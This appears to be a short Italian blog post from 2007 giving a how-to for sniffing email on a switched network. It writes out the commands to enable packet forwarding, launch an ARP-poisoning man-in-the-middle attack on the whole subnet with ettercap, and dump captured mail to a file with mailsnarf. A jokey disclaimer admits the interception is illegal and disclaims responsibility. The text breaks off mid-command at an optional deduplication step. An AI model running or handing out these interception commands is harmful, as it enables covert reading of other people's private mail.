19 dicembre 2007

Mail sniffing con network switched

Paraculaggine: è illegale intercettare le comunicazioni altrui senza permesso e blablabla, i test sono stati eseguiti in una rete simulata. Se fate cavolate e vi beccano sono solo affaracci vostri.

Prima di tutto ci servono i programmi dsniff, ettercap ed opzionalmente procmail; quindi installateli usando i pacchetti della vostra distribuzione.

Avviamo ettercap in modalità MITM only avendo precedentemente attivato il forwarding dei pacchetti (ATTENZIONE: se non attivate il forwarding dei pacchetti la rete smetterà di funzionare):

# sysctl -w net.ipv4.ip_forward=1
# ettercap -o -M arp:remote // //

Da un altro terminale avviamo mailsnarf (che fa parte del pacchetto dsniff) e salviamo le mail in un file:

# mailsnarf > /var/tmp/mail.tmp

(opzionale) Eliminare le mail duplicate

$ cat > /var/tmp/procmail <